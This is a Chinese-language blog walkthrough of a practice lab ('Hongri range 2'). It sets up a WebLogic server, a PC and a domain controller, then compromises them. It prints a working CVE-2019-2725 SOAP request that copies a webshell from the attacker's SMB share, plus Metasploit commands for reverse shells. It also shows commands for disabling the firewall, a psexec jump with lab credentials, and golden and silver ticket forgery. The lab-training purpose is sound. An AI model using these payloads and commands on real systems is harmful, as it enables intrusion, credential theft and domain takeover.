红日靶场2-wp

红日靶场2

🌋环境搭建

🚘靶场配置

靶场拓扑图如下:

image-20220729130027946

首先先新建一个网卡,

image-20220729121233969

PC

PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。

image-20220729121920944

由于作者默认的网段设置为111,所以需要将自己的NAT也修改成111,但我习惯了自己的ip。所以就得改两个网卡,将其修改网段为自己的NAT地址,

image-20220729125000693

网络配置情况如下:

image-20220729125604603

DC

选择前面配置的网卡

image-20220729122123392

网络配置如下

image-20220729125506015

WEB

这台机器有点坑,当登录WEB虚拟机时,需要先恢复快照3,登陆时切换用户为: WEB\de1ay 密码: 1qaz@WSX 才能进入

image-20220729123926727

修改NAT网卡的网段

image-20220729124345520

进入目录C:\Oracle\Middleware\user_projects\domains\base_domain,运行statweblogic服务。注意要以管理员身份运行

image-20220729125239430

网络配置如下:

image-20220729125347242

整理如下:

主机 网卡1(内) 网卡2(外)
kali \ 192.168.130.5
WEB 10.10.10.80 192.168.130.80
PC 10.10.10.201 192.168.130.201
DC 10.10.10.10 \

💺web打点

🛹信息收集

端口服务及目录

分别扫描80的端口及服务

nmap -sV 192.168.130.80

image-20220729155155024

image-20220729161025149

扫了一下80端口的目录,这些目录没什么利用点

image-20220729163604889

访问7001端口,是个404页面

weblogic后台登录地址:

http://your-ip:7001/console

image-20220729171923635

脚本小子上线。先用goby扫一下指纹信息,有一个高危的ms17_010

image-20220729162612726

vulmap扫出来一个cve-2020-2883

image-20220729163958917

利用weblogic检测工具:

cve-2020-14750cve-2019-2725

python3 .\ws.py -t 192.168.130.80 -p 7001

image-20220729182311649

🚥漏洞利用

🌆exp利用

基于前面的信息进行逐一尝试,先试试CVE-2019-2725

proxychains git clone https://github.com/TopScrew/CVE-2019-2725.git 
 pip install logzero 
 pip install requests 
 python weblogic-2019-2725.py 10.3.6 http://192.168.130.80:7001

image-20220730182231788

访问地址:可以执行简单命令

http://192.168.130.80:7001/bea_wls_internal/demo.jsp?pwd=admin&cmd=ipconfig

image-20220730182457295

但是带空格命令会报参数传递错误,下载不了

image-20220730183656413

换一个exp继续尝试,首先开启共享文件夹

impacket-smbserver share /root/1/behinder/server &

image-20220802214853303

在靶机这边可以访问到马子

image-20220802214132408

然后准备exp,修改好HOST和马子的地址

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.130.80:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
DNT: 1
Connection: close
Content-Type: text/xml
Content-Length: 839

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>copy \\192.168.130.5\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp </string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

发包,回应为202则成功

image-20220802214220472

冰蝎连接马子就可以拿到shell

image-20220802214737862

⛄工具利用

利用Java反序列化工具探测存在漏洞为cve-2017-10271

image-20220730211057413

因为有数字卫士,普通一句话会被干。故传冰蝎马上去,下面给出了连接地址

image-20220730224451576

连接成功,接下来就是转战cs还是msf

image-20220730224736899

若是cs,就需要简单做个免杀

image-20220730231952853

运行即可反弹到cs

image-20220730235033586

若是msf则直接可以利用冰蝎里面给出的来:

 use exploit/multi/handler
 set payload java/meterpreter/reverse_tcp
 set lhost 192.168.130.5

image-20220730234649077

🌗msf利用

ms17_010

image-20220729170000195

cve-2020-14750

image-20220729174315956

cve-2020-2883

image-20220729174606282

cve-2019-2725成功

search cve-2019-2725
use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
show options         
set rhosts 192.168.130.80
set lhost 192.168.130.5
set target Windows

image-20220729185717772

🌈内网渗透

🛵信息收集

跳板机信息收集

直接提权不成

image-20220802222334674

迁移到有system权限的进程上就可以导出密码

image-20220802222305019

查看一下有哪些应用,发现了数字卫士

run post/windows/gather/enum_applications

image-20220729191202795

msf派生会话至cs

内网遨游还得cs方便一些故转移会话至cs

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.130.5
set lport 9999
set session 2

image-20220729191919254

cs上提权成功

image-20220729192846308

搜集域内信息

查看本机ip,所在域为delay.com:

shell ipconfig /all

image-20220729193132571

关闭防火墙:

shell netsh advfirewall show all state  		  //查看防火墙状态
shell netsh advfirewall set allprofile state off  //关闭防火墙

image-20220729194744060

查看域控和域中的其他主机名

net group "domain controllers" /domain
net group "domain computers" /domain

image-20220729200457188

🌌横向移动

生成凭证拿域控

rev2self
make_token delay.com\Administrator 1qaz@WSX
jump psexec DC smb

image-20220729210750529

但是后面出现网络问题,另一台机子死活扫不到就作罢了

image-20220730170315567

最终的拓扑图如下:

image-20220730170248084

🌟权限维持

🌏黄金票据

从DC中hashdump出krbtgt的hash值,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

image-20220730173405857

在DC查看域的sid

image-20220730173448329

在web主机生成黄金票据

image-20220730174609981

直接远程连接dir域控c盘成功

shell dir \\10.10.10.10\c$

image-20220730174809683

🕋白银票据

类似低等一点的白银票据,也是要获取sid和 hash值

image-20220730181810963

cs上填入这些

image-20220730181733405

黄金票据和白银票据最后都是这一步,访问域控的c盘

shell dir \\10.10.10.10\c$

image-20220730181929855

posted @ 2022-11-18 18:49  lockly  阅读(4847)  评论(6编辑  收藏  举报